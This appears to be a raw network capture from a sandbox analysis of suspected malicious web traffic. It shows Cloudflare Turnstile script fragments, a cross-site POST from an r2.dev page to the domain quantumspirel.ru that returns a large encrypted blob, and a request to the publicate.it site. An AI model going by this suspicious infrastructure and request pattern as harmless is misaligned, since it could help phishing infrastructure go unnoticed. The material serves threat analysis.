                                                                                                                                                                                                        2024-08-30 16:16:16 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 45 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69
                                                                                                                                                                                                        Data Ascii: function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Et(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;i
                                                                                                                                                                                                        2024-08-30 16:16:16 UTC1369INData Raw: 73 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 62 74 28 72 29 2c 73 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 66 6c 65 78 22 2c 73 2e 73 74 79 6c 65 2e 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3d 22 63 65 6e 74 65 72 22 2c 73 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 72 65 6c 61 74 69 76 65 22 2c 73 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 32 30 22 2c 73 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 73 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 73 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 73 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 70 78 22 2c 73 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e
                                                                                                                                                                                                        Data Ascii: s.style.height=bt(r),s.style.display="flex",s.style.justifyContent="center",s.style.position="relative",s.style.zIndex="21474836420",s.style.backgroundColor="#ffffff",s.style.borderRadius="5px",s.style.left="0px",s.style.top="0px",s.style.overflow="hidden


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        33192.168.2.549776172.67.187.134436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:16 UTC662OUTPOST // HTTP/1.1
                                                                                                                                                                                                        Host: quantumspirel.ru
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 16
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Origin: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Referer: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:16 UTC16OUTData Raw: 7b 22 64 61 63 65 22 3a 22 74 61 63 6b 79 22 7d
                                                                                                                                                                                                        Data Ascii: {"dace":"tacky"}
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC643INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:19 GMT
                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        x-powered-by: PHP/7.3.33
                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fmdAcU8kbGicbNKXlfOOoo63ID20yQ4ZbS9ExrtyZjH463qjLI0Fo0ahXakAcRagEV2GVZxIlbnFbbPtNzVgrPPRSI%2F0efnLxwo6nQRlZJ8uCX25FI%2B3SJAg7z3IXVkzTKYU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb6159a8ff443ca-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC726INData Raw: 34 39 32 65 0d 0a 7b 22 61 22 3a 22 4d 45 59 35 37 58 4f 54 4a 51 4b 33 62 4b 6f 31 59 64 75 33 6b 38 5a 49 49 37 33 75 75 39 59 76 77 42 78 4f 48 6b 4a 57 51 68 30 55 6b 52 46 78 78 41 35 4b 74 71 4e 41 34 72 52 63 34 38 42 46 65 75 73 4f 6c 68 56 31 35 52 52 71 44 66 6b 64 4a 6c 49 78 5c 2f 55 76 64 38 45 64 56 43 49 4c 36 39 36 6d 5a 39 59 6e 49 78 65 31 37 77 35 6d 6b 68 6e 7a 70 66 6f 54 4b 31 4b 54 4a 70 73 42 50 75 76 79 56 2b 6c 4a 64 72 6b 2b 46 7a 6a 65 4d 52 5c 2f 30 78 4b 70 47 73 6d 76 35 37 41 41 39 43 44 53 79 4e 30 49 57 51 42 32 49 50 52 4c 47 6c 52 63 50 66 45 33 30 41 78 56 72 39 53 72 74 64 53 6d 65 52 63 44 38 79 74 4a 44 76 54 4e 75 76 78 46 35 34 6d 61 6f 78 65 52 30 4a 6b 48 71 71 37 72 68 61 32 47 57 33 6a 68 4b 59 43 35 62 69 34
                                                                                                                                                                                                        Data Ascii: 492e{"a":"MEY57XOTJQK3bKo1Ydu3k8ZII73uu9YvwBxOHkJWQh0UkRFxxA5KtqNA4rRc48BFeusOlhV15RRqDfkdJlIx\/Uvd8EdVCIL696mZ9YnIxe17w5mkhnzpfoTK1KTJpsBPuvyV+lJdrk+FzjeMR\/0xKpGsmv57AA9CDSyN0IWQB2IPRLGlRcPfE30AxVr9SrtdSmeRcD8ytJDvTNuvxF54maoxeR0JkHqq7rha2GW3jhKYC5bi4
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 4b 54 78 39 59 7a 57 44 46 72 4c 79 54 6e 30 45 59 36 30 37 35 49 75 54 61 37 38 34 6c 2b 79 4c 68 30 47 66 6e 56 4a 56 39 2b 65 6d 31 39 56 56 42 6d 6b 5c 2f 43 79 30 6e 48 79 64 73 48 58 69 32 69 38 72 38 7a 52 76 79 52 58 52 46 52 64 73 33 6c 43 48 4f 57 71 41 57 72 55 4c 6c 34 79 35 4c 37 4f 64 78 73 41 4f 6d 34 42 4d 73 30 6e 4f 6d 31 45 70 50 34 2b 63 69 68 76 59 63 79 34 4f 68 43 42 65 55 54 34 33 52 74 61 37 77 57 4b 69 55 75 6e 72 35 30 68 52 33 4b 6c 38 4c 43 54 62 63 63 38 69 50 33 30 58 56 33 48 4a 51 56 6c 46 63 57 53 33 47 6a 51 4d 76 38 4a 59 35 6c 72 50 77 36 52 63 6d 4b 61 34 68 4b 58 52 71 72 6f 54 33 34 54 55 4c 59 6d 45 43 5c 2f 63 78 67 54 4a 4d 58 4a 71 74 30 76 4d 70 72 45 74 34 65 7a 67 6e 6d 46 47 78 46 78 46 71 6f 38 53 71 59 6a
                                                                                                                                                                                                        Data Ascii: KTx9YzWDFrLyTn0EY6075IuTa784l+yLh0GfnVJV9+em19VVBmk\/Cy0nHydsHXi2i8r8zRvyRXRFRds3lCHOWqAWrULl4y5L7OdxsAOm4BMs0nOm1EpP4+cihvYcy4OhCBeUT43Rta7wWKiUunr50hR3Kl8LCTbcc8iP30XV3HJQVlFcWS3GjQMv8JY5lrPw6RcmKa4hKXRqroT34TULYmEC\/cxgTJMXJqt0vMprEt4ezgnmFGxFxFqo8SqYj
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 57 55 51 45 66 42 4c 78 67 4b 30 62 78 64 49 6e 31 6b 75 46 44 36 76 61 50 5c 2f 33 39 63 33 33 4b 36 6f 56 54 6c 44 62 36 66 2b 55 74 51 72 33 4c 6d 44 50 62 4e 54 71 73 66 33 33 34 37 44 52 4d 44 45 65 35 4a 4c 66 53 6c 72 4e 6b 74 67 33 76 5a 47 50 31 51 49 55 36 78 57 4b 2b 36 6a 79 56 36 56 75 6a 5c 2f 31 4f 6c 42 45 4e 4e 76 79 62 56 54 33 61 62 50 75 78 43 77 2b 50 57 30 6f 41 34 51 31 72 41 73 39 66 57 75 50 35 55 31 58 53 54 51 32 79 53 7a 75 6f 4a 53 47 64 34 76 6a 4d 7a 71 54 6d 51 7a 38 78 6b 39 62 78 44 4e 56 74 43 52 38 4c 73 6c 72 44 62 66 74 42 4f 78 52 71 6f 4a 5c 2f 76 76 4f 4e 42 46 58 48 48 59 75 33 56 2b 6e 6c 77 7a 53 6f 45 56 32 2b 31 39 44 5c 2f 58 6d 43 6d 49 70 45 75 55 5c 2f 65 36 70 49 75 30 6a 59 4d 5c 2f 5c 2f 67 38 39 2b 42
                                                                                                                                                                                                        Data Ascii: WUQEfBLxgK0bxdIn1kuFD6vaP\/39c33K6oVTlDb6f+UtQr3LmDPbNTqsf3347DRMDEe5JLfSlrNktg3vZGP1QIU6xWK+6jyV6Vuj\/1OlBENNvybVT3abPuxCw+PW0oA4Q1rAs9fWuP5U1XSTQ2ySzuoJSGd4vjMzqTmQz8xk9bxDNVtCR8LslrDbftBOxRqoJ\/vvONBFXHHYu3V+nlwzSoEV2+19D\/XmCmIpEuU\/e6pIu0jYM\/\/g89+B
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 2f 53 68 6c 49 44 58 53 58 4f 38 50 79 4b 61 54 70 79 6b 59 37 56 42 78 49 7a 66 6a 47 55 68 71 36 77 62 6b 4d 50 54 65 67 79 39 4d 4c 75 47 7a 43 72 46 63 48 43 69 66 68 56 41 41 42 33 57 51 58 52 35 4f 51 31 52 32 64 6e 6a 73 53 63 42 72 37 4a 36 78 6b 71 42 67 54 4d 64 73 46 46 35 4b 51 5c 2f 67 37 4e 75 6c 58 33 59 2b 7a 30 79 32 35 7a 42 50 59 6f 4f 49 4e 62 33 67 30 2b 54 47 68 5c 2f 41 46 6f 4b 48 7a 4c 55 7a 63 59 6f 42 45 43 32 49 4c 45 56 79 76 4d 52 67 2b 32 6d 46 69 78 4b 53 51 35 31 5c 2f 47 36 5c 2f 71 61 66 58 56 4f 4e 35 57 74 48 6e 30 6c 30 46 70 69 6c 66 52 6b 47 6a 45 63 4f 69 63 47 43 31 73 69 57 6b 7a 43 44 68 59 7a 42 36 6e 4d 75 6e 76 70 63 30 66 76 45 55 71 6e 69 48 72 47 67 72 66 4e 71 50 4a 73 38 31 34 50 58 55 34 48 74 62 33 7a
                                                                                                                                                                                                        Data Ascii: /ShlIDXSXO8PyKaTpykY7VBxIzfjGUhq6wbkMPTegy9MLuGzCrFcHCifhVAAB3WQXR5OQ1R2dnjsScBr7J6xkqBgTMdsFF5KQ\/g7NulX3Y+z0y25zBPYoOINb3g0+TGh\/AFoKHzLUzcYoBEC2ILEVyvMRg+2mFixKSQ51\/G6\/qafXVON5WtHn0l0FpilfRkGjEcOicGC1siWkzCDhYzB6nMunvpc0fvEUqniHrGgrfNqPJs814PXU4Htb3z
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 4e 69 56 78 32 30 6b 50 58 75 5a 39 79 69 4b 63 44 64 54 44 4c 53 6a 7a 67 67 77 6d 6c 39 64 34 5a 74 50 4a 79 34 47 32 58 4f 71 6c 42 6a 47 5c 2f 64 50 4e 44 70 59 6c 4e 49 45 44 4b 75 57 72 64 2b 33 58 6d 61 73 41 4c 39 59 5a 39 67 67 6a 53 59 50 34 51 6d 7a 73 64 69 31 6b 37 64 37 4c 53 30 6d 39 79 43 67 31 6b 74 75 30 48 44 65 6c 36 6f 75 4e 2b 4b 64 48 76 4b 54 57 71 59 7a 79 2b 50 5c 2f 70 36 6d 7a 77 78 62 4f 66 65 35 75 43 6a 4e 51 46 68 4c 6c 47 4f 72 4d 71 4d 63 4c 6d 78 41 2b 4f 4b 39 54 63 77 33 56 45 7a 4c 65 72 5a 46 56 6c 44 6a 6c 74 6b 46 59 43 58 52 6b 73 4b 4b 72 31 43 64 48 4f 44 32 65 46 6f 63 4d 6f 4e 43 38 37 55 61 78 68 5a 38 31 2b 2b 67 72 33 47 4c 43 68 78 4a 46 37 67 52 36 59 5a 5a 79 74 57 4b 46 54 6d 68 4e 66 52 64 71 52 71 30
                                                                                                                                                                                                        Data Ascii: NiVx20kPXuZ9yiKcDdTDLSjzggwml9d4ZtPJy4G2XOqlBjG\/dPNDpYlNIEDKuWrd+3XmasAL9YZ9ggjSYP4Qmzsdi1k7d7LS0m9yCg1ktu0HDel6ouN+KdHvKTWqYzy+P\/p6mzwxbOfe5uCjNQFhLlGOrMqMcLmxA+OK9Tcw3VEzLerZFVlDjltkFYCXRksKKr1CdHOD2eFocMoNC87UaxhZ81++gr3GLChxJF7gR6YZZytWKFTmhNfRdqRq0
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 2b 68 57 36 62 35 2b 4a 55 6e 45 70 33 47 71 52 39 61 33 43 43 39 65 7a 48 38 47 5c 2f 44 36 34 53 4d 5a 51 37 52 48 47 5c 2f 76 58 71 2b 70 41 48 4b 32 47 63 34 73 79 57 44 4e 76 2b 6d 55 66 4a 50 6e 6c 67 50 6e 46 53 58 76 56 75 74 65 55 74 6e 49 37 30 31 7a 36 4c 46 39 79 47 7a 46 6e 7a 77 35 4c 7a 41 61 63 37 55 63 6d 4d 6d 5a 67 56 52 6f 72 38 34 65 6e 77 42 37 69 42 36 43 78 5c 2f 69 4d 51 56 5a 46 73 32 4a 35 37 58 44 61 48 6f 5c 2f 6c 4b 55 32 55 44 4c 6b 55 31 4d 51 2b 6e 44 75 52 78 71 37 5c 2f 44 35 4f 34 68 79 39 74 76 4c 37 67 4b 71 4f 4e 54 38 45 51 65 41 45 41 54 66 42 32 57 66 6e 72 51 51 73 52 33 39 49 38 64 59 45 72 51 6b 38 59 4e 4f 71 70 41 4c 7a 44 6a 74 70 37 6d 2b 76 48 52 4e 63 5c 2f 41 65 53 77 46 6d 67 42 34 68 4f 75 6b 32 37 53
                                                                                                                                                                                                        Data Ascii: +hW6b5+JUnEp3GqR9a3CC9ezH8G\/D64SMZQ7RHG\/vXq+pAHK2Gc4syWDNv+mUfJPnlgPnFSXvVuteUtnI701z6LF9yGzFnzw5LzAac7UcmMmZgVRor84enwB7iB6Cx\/iMQVZFs2J57XDaHo\/lKU2UDLkU1MQ+nDuRxq7\/D5O4hy9tvL7gKqONT8EQeAEATfB2WfnrQQsR39I8dYErQk8YNOqpALzDjtp7m+vHRNc\/AeSwFmgB4hOuk27S
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 71 5c 2f 68 56 7a 66 52 66 63 4f 57 70 73 43 79 32 61 67 51 2b 34 51 36 63 55 70 45 65 76 48 74 56 6e 79 41 53 65 5c 2f 48 4d 39 4b 67 61 4f 45 64 33 77 39 63 69 75 73 75 72 44 6b 69 5a 63 66 52 76 65 4a 75 51 6b 4c 33 6b 42 58 2b 4e 55 6c 4f 49 48 47 6c 57 72 6a 63 55 7a 49 31 52 66 51 56 5c 2f 79 68 33 64 6e 79 67 66 4d 63 4e 6b 69 6c 38 34 45 65 34 51 67 6c 30 5a 50 63 4d 65 72 44 64 32 68 46 6a 39 67 4e 57 4a 6a 72 79 54 6f 5a 5a 6d 4e 69 57 43 51 37 38 4a 6f 6c 75 36 69 41 6a 61 76 53 38 77 56 51 53 7a 5a 5c 2f 7a 69 32 49 59 59 71 58 34 6a 4c 36 36 67 68 4e 58 30 47 72 32 50 38 75 79 75 6d 33 70 39 70 35 78 38 5a 65 33 42 70 4c 46 6b 71 35 61 33 41 73 51 56 4a 4b 6e 35 68 66 70 32 53 6c 72 71 43 30 6d 4e 46 70 39 48 6e 35 6f 44 6f 66 58 69 43 6d 33
                                                                                                                                                                                                        Data Ascii: q\/hVzfRfcOWpsCy2agQ+4Q6cUpEevHtVnyASe\/HM9KgaOEd3w9ciusurDkiZcfRveJuQkL3kBX+NUlOIHGlWrjcUzI1RfQV\/yh3dnygfMcNkil84Ee4Qgl0ZPcMerDd2hFj9gNWJjryToZZmNiWCQ78Jolu6iAjavS8wVQSzZ\/zi2IYYqX4jL66ghNX0Gr2P8uyum3p9p5x8Ze3BpLFkq5a3AsQVJKn5hfp2SlrqC0mNFp9Hn5oDofXiCm3
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 42 35 2b 44 64 5c 2f 51 49 79 63 78 75 5c 2f 4f 4e 38 78 76 47 5c 2f 4c 41 75 58 4e 55 38 69 6a 52 44 31 49 74 62 59 5a 5a 58 42 52 62 41 55 31 51 43 58 45 59 57 48 66 44 34 6c 42 46 48 4f 4d 58 6d 6b 6a 76 63 34 48 76 44 47 32 30 59 5c 2f 42 34 4c 51 41 72 49 79 78 57 53 32 51 4c 6f 69 59 4b 6d 63 72 32 68 36 4b 78 5a 66 59 50 53 56 36 71 45 75 4b 47 54 75 52 56 34 79 5a 55 66 44 53 65 36 68 70 49 4f 44 57 42 71 52 32 47 75 42 73 30 64 36 79 2b 66 77 53 4e 6a 6a 38 32 68 69 4b 71 74 6e 75 59 4b 30 51 71 72 73 73 45 6e 78 2b 49 47 36 37 34 47 55 7a 6b 7a 49 58 50 2b 4d 5a 2b 48 71 65 42 71 55 6a 31 58 35 71 4f 38 46 54 47 69 51 6b 2b 74 6e 51 30 44 54 6d 73 6f 44 66 4f 36 44 71 68 4d 6a 62 5c 2f 5a 65 4c 33 38 44 52 54 4f 64 4a 79 68 63 47 58 42 67 5c 2f
                                                                                                                                                                                                        Data Ascii: B5+Dd\/QIycxu\/ON8xvG\/LAuXNU8ijRD1ItbYZZXBRbAU1QCXEYWHfD4lBFHOMXmkjvc4HvDG20Y\/B4LQArIyxWS2QLoiYKmcr2h6KxZfYPSV6qEuKGTuRV4yZUfDSe6hpIODWBqR2GuBs0d6y+fwSNjj82hiKqtnuYK0QqrssEnx+IG674GUzkzIXP+MZ+HqeBqUj1X5qO8FTGiQk+tnQ0DTmsoDfO6DqhMjb\/ZeL38DRTOdJyhcGXBg\/
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 45 75 77 51 63 47 6f 6b 54 54 64 54 5c 2f 43 30 36 52 2b 6f 4d 79 78 31 79 56 55 57 41 69 62 44 2b 51 55 49 51 72 41 37 33 52 44 52 2b 37 53 7a 2b 54 48 45 36 48 75 4a 49 4a 7a 38 68 46 36 31 56 78 6d 61 30 5c 2f 33 34 77 49 32 36 4a 38 48 73 54 46 56 55 5a 35 4d 30 45 78 73 56 51 56 6d 64 38 6d 59 75 74 4a 61 6b 43 34 44 36 45 79 31 65 77 31 69 55 6e 67 35 67 4e 49 54 41 57 4b 55 5c 2f 71 45 51 6c 4e 41 73 66 6d 4f 66 38 45 63 51 4d 6f 68 71 65 4d 38 72 53 6d 45 32 5c 2f 64 6f 56 32 74 77 51 70 69 76 55 69 68 53 4d 4d 4e 65 49 66 5c 2f 62 37 34 47 73 66 30 36 49 44 6b 6a 68 61 57 59 78 6a 36 76 49 6f 57 76 4c 48 6d 5c 2f 62 69 4e 73 44 74 39 5a 79 6c 64 30 59 49 62 2b 76 36 39 67 4a 56 6a 6b 52 6e 35 6b 4c 47 63 67 71 75 6b 4d 70 76 43 48 45 6e 66 75 43
                                                                                                                                                                                                        Data Ascii: EuwQcGokTTdT\/C06R+oMyx1yVUWAibD+QUIQrA73RDR+7Sz+THE6HuJIJz8hF61Vxma0\/34wI26J8HsTFVUZ5M0ExsVQVmd8mYutJakC4D6Ey1ew1iUng5gNITAWKU\/qEQlNAsfmOf8EcQMohqeM8rSmE2\/doV2twQpivUihSMMNeIf\/b74Gsf06IDkjhaWYxj6vIoWvLHm\/biNsDt9Zyld0YIb+v69gJVjkRn5kLGcgqukMpvCHEnfuC


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        34192.168.2.549778104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:17 UTC731OUTGET /?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:17 UTC952INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:17 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                        cache-control: no-store, no-cache, must-revalidate,private
                                                                                                                                                                                                        pragma: no-cache
                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        set-cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; path=/
                                                                                                                                                                                                        set-cookie: do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; Max-Age=300; Path=/; HttpOnly; SameSite=Lax
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RDpYXVJGZEOCQ%2BB3B4AjsqvM2k12snRXwBOxIw0DP6c3d2XTxZTP6kfDlLtv4BMuajBgnDD%2BU5bdVpdHODY8eMSeG6C9FKCxI9tueL%2BmH3e1ebW53qp%2ByNyFkch3Pg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb6159f1fb14270-EWR
                                                                                                                                                                                                        2024-08-30 16:16:17 UTC417INData Raw: 37 62 65 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 77 66 2d 70 61 67 65 3d 22 36 30 35 61 32 34 66 64 36 64 64 35 39 33 66 37 30 65 32 30 61 32 37 38 22 20 64 61 74 61 2d 77 66 2d 73 69 74 65 3d 22 35 65 39 31 37 30 62 61 33 37 63 66 38 64 66 61 65 30 33 61 65 31 61 34 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 50 75 62 6c 69 63 61 74 65 20 7c 20 48 54 4d 4c 20 45 6d 61 69 6c 20 54 65 6d 70 6c 61 74 65 20 42 75 69 6c 64 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 44 65 73 69 67 6e 20 26 61 6d 70 3b 20 63 72 65 61 74 65 20 62 65 61 75 74 69 66 75 6c 20 6e 65 77 73 6c 65 74 74 65 72 73 20 69 6e 20
                                                                                                                                                                                                        Data Ascii: 7bea<!DOCTYPE html><html data-wf-page="605a24fd6dd593f70e20a278" data-wf-site="5e9170ba37cf8dfae03ae1a4"><head><meta charset="utf-8"><title>Publicate | HTML Email Template Builder</title><meta content="Design &amp; create beautiful newsletters in
                                                                                                                                                                                                        2024-08-30 16:16:17 UTC1369INData Raw: 48 54 4d 4c 20 45 6d 61 69 6c 20 54 65 6d 70 6c 61 74 65 20 42 75 69 6c 64 65 72 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 44 65 73 69 67 6e 20 26 61 6d 70 3b 20 63 72 65 61 74 65 20 62 65 61 75 74 69 66 75 6c 20 6e 65 77 73 6c 65 74 74 65 72 73 20 69 6e 20 6d 69 6e 75 74 65 73 20 77 69 74 68 20 6f 75 72 20 70 6f 77 65 72 66 75 6c 20 65 6d 61 69 6c 20 62 75 69 6c 64 65 72 2e 20 4f 75 72 20 48 54 4d 4c 20 65 6d 61 69 6c 20 74 65 6d 70 6c 61 74 65 20 62 75 69 6c 64 65 72 20 61 6c 6c 6f 77 73 20 79 6f 75 20 74 6f 20 65 78 70 6f 72 74 20 77 69 74 68 6f 75 74 20 61 6e 79 20 63 6f 64 69 6e 67 2e 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 3c 6d 65
                                                                                                                                                                                                        Data Ascii: HTML Email Template Builder" property="og:title"><meta content="Design &amp; create beautiful newsletters in minutes with our powerful email builder. Our HTML email template builder allows you to export without any coding." property="og:description"><me
                                                                                                                                                                                                        2024-08-30 16:16:17 UTC1369INData Raw: 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 57 65 62 46 6f 6e 74 2e 6c 6f 61 64 28 7b 20 20 67 6f 6f 67 6c 65 3a 20 7b 20 20 20 20 66 61 6d 69 6c 69 65 73 3a 20 5b 22 4c 61 74 6f 3a 31 30 30 2c 31 30 30 69 74 61 6c 69 63 2c 33 30 30 2c 33 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 34 30 30 69 74 61 6c 69 63 2c 37 30 30 2c 37 30 30 69 74 61 6c 69 63 2c 39 30 30 2c 39 30 30 69 74 61 6c 69 63 22 2c 22 4d 6f 6e 74 73 65 72 72 61 74 3a 31 30 30 2c 31 30 30 69 74 61 6c 69 63 2c 32 30 30 2c 32 30 30 69 74 61 6c 69 63 2c 33 30 30 2c 33 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 34 30 30 69 74 61 6c 69 63 2c 35 30 30 2c 35 30 30
                                                                                                                                                                                                        Data Ascii: ype="text/javascript"></script><script type="text/javascript">WebFont.load({ google: { families: ["Lato:100,100italic,300,300italic,400,400italic,700,700italic,900,900italic","Montserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500
